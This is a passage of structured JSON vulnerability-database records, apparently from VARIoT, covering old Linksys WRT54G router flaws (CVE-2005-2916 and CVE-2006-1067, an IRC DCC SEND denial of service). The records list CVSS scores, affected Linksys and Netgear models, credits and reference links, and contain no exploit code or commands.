"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=306\u0026type=vulnerabilities"
},
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=307\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=306\u0026amp;type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=307\u0026amp;type=vulnerabilities"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14125"
},
{
"db": "BID",
"id": "89357"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14125"
},
{
"db": "BID",
"id": "89357"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-14T00:00:00",
"db": "VULHUB",
"id": "VHN-14125"
},
{
"date": "2005-09-14T00:00:00",
"db": "BID",
"id": "89357"
},
{
"date": "2005-09-14T21:03:00",
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"date": "2005-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14125"
},
{
"date": "2016-07-06T14:34:00",
"db": "BID",
"id": "89357"
},
{
"date": "2008-09-05T20:52:59.187000",
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G User authentication bypass vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
],
"trust": 0.6
}
}
VAR-200603-0053
Vulnerability from variot - Updated: 2023-12-18 12:47
Linksys WRT54G routers version 5 (running VxWorks) allow remote attackers to cause a denial of service by sending a malformed DCC SEND string to an IRC channel, which causes an IRC connection reset, possibly related to the masquerading code for NAT environments, and as demonstrated via (1) a DCC SEND with a single long argument, or (2) a DCC SEND with IP, port, and filesize arguments with a 0 value. Linksys and Netgear routers are susceptible to a remote IRC denial-of-service vulnerability. This issue is due to a failure of the devices to properly handle unexpected network traffic. This issue allows remote attackers to disconnect IRC sessions, denying service to legitimate users. Linksys WRT54G routers are vulnerable to this issue. Routers running with the VxWorks operating system, but not Linux-based operating systems, are reportedly affected. Specific device and firmware version information is not currently available. This BID will be updated as further information is disclosed.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200603-0053",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g v5",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "no",
"version": null
},
{
"model": "wrt54g v5",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wgt624",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "0"
},
{
"model": "rt314/rt311 gateway router",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "3.25"
},
{
"model": "rt314/rt311 gateway router",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "3.24"
},
{
"model": "rt314/rt311 gateway router",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "3.22"
},
{
"model": "rt-338",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "me102",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.4"
},
{
"model": "me102",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.3"
},
{
"model": "fvs318v2",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "2.4"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "2.4"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.3"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.2"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.1"
},
{
"model": "fvs318",
"scope": "eq",
"trust": 0.3,
"vendor": "netgear",
"version": "1.0"
},
{
"model": "fm114p",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "dg834g",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "dg834 adsl firewall router",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "publisher 3f",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20021.40"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "4.70.6"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "4.50.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
},
{
"model": "wap55ag",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.0.7"
},
{
"model": "wap11",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.2"
},
{
"model": "wap11",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.4"
},
{
"model": "wap11",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.3"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.42.7"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.40.3"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router b",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.9"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router b",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.2"
},
{
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.2"
},
{
"model": "etherfast befvp41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39.64"
},
{
"model": "etherfast befvp41 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.44"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.42.7"
},
{
"model": "etherfast befsr81 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.45.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.38"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.37"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.36"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.35"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.05.00"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befn2ps4 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.4.3"
},
{
"model": "befw11s4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.4.2.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.4"
},
{
"model": "befvp41 .3f",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.45.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.4"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2"
},
{
"model": "befsr81",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befsr41w",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befsr41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1"
},
{
"model": "befn2ps4",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befcmu10",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "wrt54g v5",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g_v5:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ryanmeyer14@netscape.net discovered this issue. Both ryanmeyer14@netscape.net and \"Cade Cairns\" \u003ccairnsc@gmail.com\u003e disclosed this issue.",
"sources": [
{
"db": "BID",
"id": "16954"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
],
"trust": 0.9
},
"cve": "CVE-2006-1067",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2006-1318",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-17175",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-1067",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2006-1318",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200603-107",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-17175",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G routers version 5 (running VXWorks) allow remote attackers to cause a denial of service by sending a malformed DCC SEND string to an IRC channel, which causes an IRC connection reset, possibly related to the masquerading code for NAT environments, and as demonstrated via (1) a DCC SEND with a single long argument, or (2) a DCC SEND with IP, port, and filesize arguments with a 0 value. DCC SEND, or (2) a DCC SEND with an IP address, port, and file size parameter value of 0. Linksys and Netgear routers are susceptible to a remote IRC denial-of-service vulnerability. This issue is due to a failure of the devices to properly handle unexpected network traffic. \nThis issue allows remote attackers to disconnect IRC sessions, denying service to legitimate users. \nLinksys WRT54G routers are vulnerable to this issue. Routers running with the VxWorks operating system, but not Linux-based operating systems, are reportedly affected. Specific device and firmware version information is not currently available. This BID will be updated as further information is disclosed",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "VULHUB",
"id": "VHN-17175"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-1067",
"trust": 2.8
},
{
"db": "BID",
"id": "16954",
"trust": 2.6
},
{
"db": "BUGTRAQ",
"id": "20060306 RE: LINKSYS ROUTER + IRC DOS",
"trust": 1.2
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2006-1318",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20060304 VARIOUS ROUTER DOS",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20060303 LINKSYS ROUTER + IRC DOS",
"trust": 0.6
},
{
"db": "XF",
"id": "25230",
"trust": 0.6
},
{
"db": "IVD",
"id": "CCDF0954-2354-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-17175",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"id": "VAR-200603-0053",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
}
],
"trust": 1.5009907
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
}
]
},
"last_update_date": "2023-12-18T12:47:09.542000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1067"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/16954"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/426863/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.hm2k.org/news/1141413208.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/426761/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/426756/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/426934/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25230"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/426934/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/426761/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/426756/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/25230"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/"
},
{
"trust": 0.3,
"url": "http://www.netgear.com/support_main.asp"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
},
{
"trust": 0.3,
"url": "/archive/1/426761"
},
{
"trust": 0.3,
"url": "/archive/1/426756"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-07T00:00:00",
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"date": "2006-03-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"date": "2006-03-07T00:00:00",
"db": "VULHUB",
"id": "VHN-17175"
},
{
"date": "2006-03-04T00:00:00",
"db": "BID",
"id": "16954"
},
{
"date": "2006-03-07T22:06:00",
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"date": "2006-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"date": "2018-10-18T00:00:00",
"db": "VULHUB",
"id": "VHN-17175"
},
{
"date": "2016-07-06T14:40:00",
"db": "BID",
"id": "16954"
},
{
"date": "2018-10-18T16:30:32.073000",
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"date": "2006-03-09T00:00:00",
"db": "CNNVD",
